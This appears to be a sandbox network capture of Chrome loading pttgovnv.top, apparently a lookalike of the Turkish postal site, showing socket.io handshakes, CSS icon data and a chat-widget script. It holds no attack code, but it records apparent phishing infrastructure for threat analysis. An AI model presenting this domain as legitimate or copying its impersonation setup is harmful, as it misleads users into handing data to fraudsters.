          2024-09-01 22:25:34 UTC7271INData Raw: 3a 22 5c 66 32 35 36 22 7d 2e 66 61 2d 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 37 39 22 7d 2e 66 61 2d 77 6f 72 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 39 39 22 7d 2e 66 61 2d 68 6f 75 73 65 2d 63 69 72 63 6c 65 2d 78 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 30 62 22 7d 2e 66 61 2d 70 6c 75 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 37 22 7d 2e 66 61 2d 68 61 6e 64 2d 73 70 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 35 39 22 7d 2e 66 61 2d 73 74 6f 70 77 61 74 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22
          Data Ascii: :"\f256"}.fa-om:before{content:"\f679"}.fa-worm:before{content:"\e599"}.fa-house-circle-xmark:before{content:"\e50b"}.fa-plug:before{content:"\f1e6"}.fa-chevron-up:before{content:"\f077"}.fa-hand-spock:before{content:"\f259"}.fa-stopwatch:before{content:"
          2024-09-01 22:25:34 UTC7271INData Raw: 5c 65 31 34 30 22 7d 2e 66 61 2d 68 65 61 64 73 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 30 22 7d 2e 66 61 2d 73 74 6f 72 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 31 22 7d 2e 66 61 2d 72 6f 61 64 2d 63 69 72 63 6c 65 2d 78 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 36 36 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 30 33 22 7d 2e 66 61 2d 6d 61 72 73 2d 73 74 72 6f 6b 65 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6d 61 72 73 2d 73 74 72 6f 6b 65 2d 76 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 61 22 7d 2e 66 61 2d 63 68 61 6d 70 61 67 6e 65 2d 67 6c 61 73 73 65 73 3a 62 65
          Data Ascii: \e140"}.fa-headset:before{content:"\f590"}.fa-store-slash:before{content:"\e071"}.fa-road-circle-xmark:before{content:"\e566"}.fa-user-minus:before{content:"\f503"}.fa-mars-stroke-up:before,.fa-mars-stroke-v:before{content:"\f22a"}.fa-champagne-glasses:be
          2024-09-01 22:25:34 UTC7271INData Raw: 6e 74 65 6e 74 3a 22 5c 66 30 37 65 22 7d 2e 66 61 2d 68 6f 75 73 65 2d 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 31 30 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 2d 61 6c 74 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 68 69 6c 64 72 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 65 31 22 7d 2e 66 61 2d 62 6c 61 63 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 62 22 7d 2e 66 61 2d 75 73 65
          Data Ascii: ntent:"\f07e"}.fa-house-lock:before{content:"\e510"}.fa-cloud-arrow-down:before,.fa-cloud-download-alt:before,.fa-cloud-download:before{content:"\f0ed"}.fa-children:before{content:"\e4e1"}.fa-blackboard:before,.fa-chalkboard:before{content:"\f51b"}.fa-use
          2024-09-01 22:25:34 UTC7271INData Raw: 61 2d 70 6c 61 6e 65 2d 64 65 70 61 72 74 75 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 62 30 22 7d 2e 66 61 2d 68 61 6e 64 73 68 61 6b 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 36 30 22 7d 2e 66 61 2d 62 6f 6f 6b 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 62 62 22 7d 2e 66 61 2d 63 6f 64 65 2d 62 72 61 6e 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 32 36 22 7d 2e 66 61 2d 68 61 74 2d 63 6f 77 62 6f 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 63 30 22 7d 2e 66 61 2d 62 72 69 64 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 63 38 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 61 6c 74 3a 62 65 66 6f 72
          Data Ascii: a-plane-departure:before{content:"\f5b0"}.fa-handshake-slash:before{content:"\e060"}.fa-book-bookmark:before{content:"\e0bb"}.fa-code-branch:before{content:"\f126"}.fa-hat-cowboy:before{content:"\f8c0"}.fa-bridge:before{content:"\e4c8"}.fa-phone-alt:befor


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          125192.168.2.449870172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:33 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P6liODe HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:34 UTC621INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:34 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQCq06Ac6%2FJu6Ys4gnkDM5fggO7KT4UUSlmweDgbYe4pEnCcHp%2FV1fNYhKq320v5IYVUzqOA0BZc1h9OJbN5LlYVyMN15yvfghyASEpOsfGjeZV%2FZN637ryIrnJC7Kc%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad4b2f5e4243-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:34 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 36 64 56 77 6b 56 6d 53 30 43 75 4a 47 33 6b 4a 42 51 55 4c 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"6dVwkVmS0CuJG3kJBQUL","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          126192.168.2.44987135.201.78.44443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:34 UTC635OUTGET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1
          Host: pttem.alo-tech.com
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: cross-site
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:34 UTC701INHTTP/1.1 200 OK
          content-type: application/javascript
          access-control-allow-origin: *
          access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Tenant
          x-content-type-options: nosniff
          Strict-Transport-Security: max-age=31536000; includeSubDomains;
          x-namespace: pttem.alo-tech.com
          x-frame-options: SAMEORIGIN
          vary: Accept-Language
          content-language: tr
          referrer-policy: same-origin
          cross-origin-opener-policy: same-origin
          x-cloud-trace-context: 409cad1ed8ae5cc5e6c22d118a7a5788
          date: Sun, 01 Sep 2024 22:25:34 GMT
          server: Google Frontend
          Content-Length: 17555
          via: 1.1 google
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
          Connection: close
          2024-09-01 22:25:34 UTC689INData Raw: 76 61 72 20 61 63 6a 73 46 75 6c 6c 73 69 7a 65 20 3d 20 66 61 6c 73 65 3b 76 61 72 20 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 2c 66 6f 63 75 73 5f 69 6e 74 65 72 76 61 6c 3d 30 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 41 6c 6f 43 68 61 74 44 72 61 77 28 74 29 7b 76 61 72 20 65 2c 61 2c 6f 3b 41 6c 6f 43 68 61 74 2e 61 6c 6f 63 68 61 74 5f 70 61 67 65 5f 74 69 74 6c 65 3d 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2c 41 6c 6f 43 68 61 74 2e 6d 75 74 65 43 68 61 74 3d 21 31 2c 30 3c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 29 2e 6c 65 6e 67 74 68 3f 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 63 68 61 74
          Data Ascii: var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat
          2024-09-01 22:25:34 UTC1390INData Raw: 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 29 2c 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 69 6e 20 6d 61 73 74 65 72 50 61 67 65 43 73 73 29 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 26 26 28 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73
          Data Ascii: style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCs
          2024-09-01 22:25:34 UTC1390INData Raw: 2b 74 2b 22 3d 22 3b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 66 6f 72 28 76 61 72 20 6e 3d 69 5b 73 5d 3b 22 20 22 3d 3d 6e 2e 63 68 61 72 41 74 28 30 29 3b 29 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 69 66 28 30 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6f 29 29 72 65 74 75 72 6e 20 6e 2e 73 75 62 73 74 72 69 6e 67 28 6f 2e 6c 65 6e 67 74 68 2c 6e 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 41 6c 6f 54 65 63 68 47 41 45 76 65 6e 74 73 28 74 2c 65 2c 61 2c 6f 2c 69 2c 73 2c 6e 29 7b 22 6f 6e 22 3d 3d 3d 74 26 26 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 5f
          Data Ascii: +t+"=";for(var o,i=document.cookie.split(";"),s=0;s<i.length;s++){for(var n=i[s];" "==n.charAt(0);)n=n.substring(1);if(0==n.indexOf(o))return n.substring(o.length,n.length)}return""}function sendAloTechGAEvents(t,e,a,o,i,s,n){"on"===t&&aloTechGetCookie("_
          2024-09-01 22:25:34 UTC1390INData Raw: 65 20 69 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 65 2e 62 65 66 6f 72 65 53 65 6e 64 28 29 2c 34 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 65 2e 63 6f 6d 70 6c 65 74 65 28 69 2c 69 2e 73 74 61 74 75 73 29 2c 32 30 30 3d 3d 69 2e 73 74 61 74 75 73 7c 7c 30 3d 3d 69 2e 73 74 61 74 75 73 3f 65 2e 73 75 63 63 65 73 73 28 4a 53 4f 4e 2e 70 61 72 73 65 28 69 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 3a 28 65 2e 65 72 72 6f 72 28 69 2e 73 74 61 74 75 73 29 2c 76 6f 69 64 20 30 21 3d 3d 65 2e 73 74 61 74 75 73 43 6f 64 65 5b 69 2e 73 74 61 74 75 73 5d 26 26 65 2e 73 74 61 74 75 73 43 6f
          Data Ascii: e i=new XMLHttpRequest;i.onreadystatechange=function(){1==i.readyState&&e.beforeSend(),4==i.readyState&&(e.complete(i,i.status),200==i.status||0==i.status?e.success(JSON.parse(i.responseText)):(e.error(i.status),void 0!==e.statusCode[i.status]&&e.statusCo
          2024-09-01 22:25:34 UTC1390INData Raw: 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 74 29 7d 61 2b 3d 22 26 70 61 67 65 5f 6f 72 69 67 69 6e 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 3b 76 61 72 20 6f 2c 69 3d 6e 75 6c 6c 2c 74 3d 6e 75 6c 6c 3b 69 66 28 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 26 26 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 3d 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 6e 61 6d 65 3d 65 2e 63 6c 69 65 6e 74 5f 6e 61 6d 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 65 6d 61 69 6c 3d 65 2e 63
          Data Ascii: {console.log(t)}a+="&page_origin="+encodeURIComponent(window.location.origin);var o,i=null,t=null;if(e.scheduled_auto_start&&(this.scheduled_auto_start=e.scheduled_auto_start,this.scheduled_auto_start_name=e.client_name,this.scheduled_auto_start_email=e.c
          2024-09-01 22:25:34 UTC1390INData Raw: 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 22 2b 65 2e 63 75 73 74 6f 6d 69 7a 65 64 5f 68 74 6d 6c 2b 22 3f 22 2b 61 7d 3a 74 68 69 73 2e 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 73 70 61 2e 68 74 6d 6c 3f 22 2b 61 7d 7d 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 3b 6c 65 74 20 6c 3d 21 31 2c 63 3d 21 31 3b 66 6f 72 28 63 75 72 55 52 4c 20 6f 66 5b 22 61 6c 6f 2d 74 65 63 68 2e 63 6f 6d 22 2c 22 63 61 6c 6c 63 65 6e 74 65 72 73 74 75 64 69 6f 2e 63 6f 6d 22 2c 22 6d 75 73 74 65 72 69 68 69 7a 6d 65 74 6c 65 72 69 2e 63 6f 6d 22 5d 29 68 26 26 30 3c 3d 68 2e 69
          Data Ascii: iframe={src:"https://"+t+"/content/"+e.customized_html+"?"+a}:this.iframe={src:"https://"+t+"/content/spa.html?"+a}}var n=document.referrer,h=document.URL;let l=!1,c=!1;for(curURL of["alo-tech.com","callcenterstudio.com","musterihizmetleri.com"])h&&0<=h.i
          2024-09-01 22:25:34 UTC1390INData Raw: 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 26 26 28 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 72 69 67 68 74 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 62 6f 74 74 6f 6d 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 26 26 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 6c 65 66 74 22
          Data Ascii: _getHeight(e.widgetHeight.toString()+"px"),a.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),MOBILE_SCREEN&&(s.style.setProperty("right","0px","important"),s.style.setProperty("bottom","0px","important"),acjs_near_left&&s.style.setProperty("left"
          2024-09-01 22:25:34 UTC1390INData Raw: 28 29 7b 73 2e 73 74 79 6c 65 2e 62 6f 78 53 68 61 64 6f 77 3d 22 30 70 78 20 30 70 78 20 35 70 78 20 30 70 78 20 23 38 38 38 38 38 38 64 36 22 7d 2c 34 30 30 29 29 2c 22 6d 61 78 69 6d 69 73 65 22 3d 3d 3d 65 2e 63 68 61 6e 67 65 54 79 70 65 3f 28 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 73 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69
          Data Ascii: (){s.style.boxShadow="0px 0px 5px 0px #888888d6"},400)),"maximise"===e.changeType?(s.style.height=chat_getHeight(e.widgetHeight.toString()+"px"),s.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),a.style.height=chat_getHeight(e.widgetHeight.toStri
          2024-09-01 22:25:34 UTC1390INData Raw: 65 6e 74 5f 6e 61 6d 65 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 7d 29 2c 22 63 75 73 74 6f 6d 65 72 5f 68 69 73 74 6f 72 79 22 69 6e 20 41 6c 6f 43 68 61 74 2e 70 61 72 61 6d 73 26 26 41 6c 6f 43 68 61 74 2e 70 61 72
          Data Ascii: ent_name:aloTechGetCookie("client_name",e.alotech_data.hostname),client_email:aloTechGetCookie("client_email",e.alotech_data.hostname),phone_number:aloTechGetCookie("phone_number",e.alotech_data.hostname)}),"customer_history"in AloChat.params&&AloChat.par
          2024-09-01 22:25:34 UTC1390INData Raw: 6c 6c 28 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 29 2c 6e 3d 30 3b 6e 3c 69 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 68 26 26 28 68 3d 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 29 3b 76 61 72 20 6c 2c 63 3d 22 22 3b 66 6f 72 28 6c 20 69 6e 20 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 29 61 6c 6f 54 65 63 68 53 65 74 43 6f 6f 6b 69 65 28 6c 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 5b 6c 5d 2c 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 3d 3d 3d 6c 7c 7c 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 3d 3d 3d 6c 7c 7c 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 3d 3d 3d 6c 3f 37 33 30 3a 31 2c
          Data Ascii: ll(".alotech-chat-body"),n=0;n<i.length;n++)i[n].querySelector("iframe")&&void 0===h&&(h=i[n].querySelector("iframe"));var l,c="";for(l in e.alotech_data)aloTechSetCookie(l,e.alotech_data[l],"client_name"===l||"client_email"===l||"phone_number"===l?730:1,


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          127192.168.2.449872172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liOS7&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 2
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:35 UTC2OUTData Raw: 34 30
          Data Ascii: 40
          2024-09-01 22:25:35 UTC612INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wxWQfTYygBgQoq8pY17pKiGjAhcoNYlhF71BPdIf4CLlvFu61%2FaVwgz2bviSEijeSrzNx1abdTOMLGQDTRAFBvzCHTZeuGrvWj5PNChI2I%2Btc3U%2BoW8Qqzq9BrhNepg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad528be032dc-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:35 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          128192.168.2.449873172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: Upgrade
          Pragma: no-cache
          Cache-Control: no-cache
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Upgrade: websocket
          Origin: https://pttgovnv.top
          Sec-WebSocket-Version: 13
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Sec-WebSocket-Key: dvwhXHr7VBVxQgPKAl6kTA==
          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          2024-09-01 22:25:35 UTC603INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQGS6K9bAXNArpOTTtsAlPtRUfQyQK9425bBa6aj5V6vaJze%2BSsZvN8jaKvVyNs2%2FD9jh4MMhsH0SJ5Ag8NLK9FEsntk04LeqMm8aEEZZuw2BON%2BJACOiTOPp9FjeOg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad5288bb8c95-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:35 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
          Data Ascii: 22{"code":3,"message":"Bad request"}
          2024-09-01 22:25:35 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


